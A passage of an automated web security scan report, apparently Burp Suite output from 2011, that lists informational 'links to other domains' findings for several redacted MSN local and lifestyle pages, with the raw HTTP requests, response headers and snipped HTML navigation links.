http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/travel?cid=msn_lifestyle_nav
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410047&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-look%2Fvideo%2F%3Ffrom%3Den-us_msnhp&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm

Request

GET /your-look/video/?from=en-us_msnhp HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:54:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=9bf5cf5d887849849fd9ba3bc1190610; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A73D332601AB449F909ED0ED21F2E58A; domain=.redacted; expires=Thu, 18-Aug-2011 17:54:07 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 20461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410047&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flifestyle.redacted%2Fyour-look%2Fvideo%2F%3Ffrom%3Den-us_msnhp&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.118. http://local.redacted/events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/events.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/events.aspx?zip={0}&q={0}

The response contains the following links to other domains:

http://msn.foxsports.com/
http://msn.match.com/msn/
http://msnbc.com/
http://qspace.iplace.com/cobrands/444/home149.asp?sc=6151HPPP
http://windowsupdate.microsoft.com/
http://www.hotmail.com/
http://www.microsoft.com/
http://www.msn.americangreetings.com/index_msn.pd
http://www.whitepages.com/5050

Request

GET /events.aspx?zip={0}&q={0} HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 23:47:54 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
STATUS_CODE: NotFound
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=eb91ff26e40940dabe69cc924b7a9d4f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=9C1F19500605454CA9159CD3F661FB58; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:54 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 6288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
       <meta http-e
...[SNIP]...
<li>
                       <a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
</a> • <a href="http://msnbc.com/">News</a>
...[SNIP]...
</a> • <a href="http://msn.foxsports.com/">Sports by FOX
                       Sports</a>
...[SNIP]...
</a> • <a href="http://www.whitepages.com/5050">White 
                       Pages</a>
...[SNIP]...
</a> • <a href="http://qspace.iplace.com/cobrands/444/home149.asp?sc=6151HPPP">Credit
                       Report</a> • <a href="http://msn.match.com/msn/">Dating &
                       Personals</a>
...[SNIP]...
</a> • <a href="http://www.msn.americangreetings.com/index_msn.pd">Greeting Cards</a>
...[SNIP]...
</a> • <a href="http://www.microsoft.com/">Microsoft.com</a>
...[SNIP]...
</a> • <a href="http://windowsupdate.microsoft.com/">Windows
                       Update</a>
...[SNIP]...

22.119. http://local.redacted/hourly.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/hourly.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/hourly.aspx?q=Dallas-TX&zip=75201

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/today?q=Dallas, Texas weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344872&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fhourly.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false

Request

GET /hourly.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=bbe1b748577047db8825d18fac531bb8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4C732E0EF53C4DA5AF527942EA10BFD3; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296344872&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fhourly.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&mkt=en-us&FORM=MSNLEC">Saturday, Jan. 29, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201">Yellow pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/today?q=Dallas, Texas weather&unit=F&Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false">Feedback</a>
...[SNIP]...

22.120. http://local.redacted/hourly.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/hourly.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/hourly.aspx?q=Dallas-TX&zip=75201

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC
http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC
http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201
http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC
http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV
http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNLEC
http://www.bing.com/shopping?FORM=MSNLEC
http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV
http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal
http://www.bing.com/weather/today?q=Dallas, Texas weather&unit=F&Form=MSNLAP
http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC
http://www.delish.com/
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406241&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fhourly.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false

Request

GET /hourly.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:41 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA25
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=99565e28cf7548c38eab16d9a43ce414; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8785AD8D573B4BC0989AC122C26DF4C7; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:41 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&v=2&rtp=~&FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406241&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Flocal.redacted%2Fhourly.aspx%3Fq%3DDallas-TX%26zip%3D75201&lc=1033&id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&mkt=en-us&FORM=MSNLEC">Sunday, Jan. 30, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=306&FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=533&FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1090&FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&order=distance&FORM=MSNLEC">Government & community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&cat=1372&FORM=MSNLEC">Hotels & motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&order=distance&FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&order=distance&FORM=MSNLEC">Sports & recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&unit=F&qpvt=weather+Dallas&form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&where=75201">Yellow pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/today?q=Dallas, Texas weather&unit=F&Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&resize=false">Feedback</a>
...[SNIP]...

22.121. http://local.redacted/movies-events.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://local.redacted
Path:	/movies-events.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://local.redacted/movies-events.aspx?zip=75207&q=75207

The response contains the following links to other domains:

http://advertising.microsoft.com/msn
http://download.live.com/?sku=messenger
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://entimg.s-redacted/i/CS/088884h1.jpg
http://mail.live.com/
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&lr=CBMSN&sc_extcmp=JS_MSN_QSBox&s_rawwords=&s_freeloc=75207
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/golf
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/tennis
http://msn.foxsports.com/video
http://msn.match.com/msn/index.aspx
http://msn.whitepages.com/
http://realestate.msn.realtor.com/realestateandhomes-search/75207?gate=msn&source=a2mszh1t042
http://video.msnbc.com/
http://www.bing.com/events/search?form=MSNLAP&q=events+near+75207
http://www.bing.com/events/search?q=12th Annual Superbowl Gospel Celebration&p1=[Events+source="vertical"+qzeventid="z144523185"]&form=MSNLAP
http://www.bing.com/events/search?q=2011 Dallas Super Bowl Weekend - Fantasy Party - Hosted by P. Diddy with Clinton Sparks&p1=[Events+source="vertical"+qzeventid="z162394705"]&form=MSNLAP
http://www.bing.com/events/search?q=2011 Super Bowl XLV Weekend Party - Hosted by the Black Eyed Peas and David Guetta&p1=[Events+source="vertical"+qzeventid="z162393185"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c100"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1000"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1100"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1200"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c1300"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c200"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c300"]&form=MSNLAP
http://www.bing.com/events/search?q=75207+events&p1=[Events+source="vertical"+cat="c400"]&form=MSNLAP
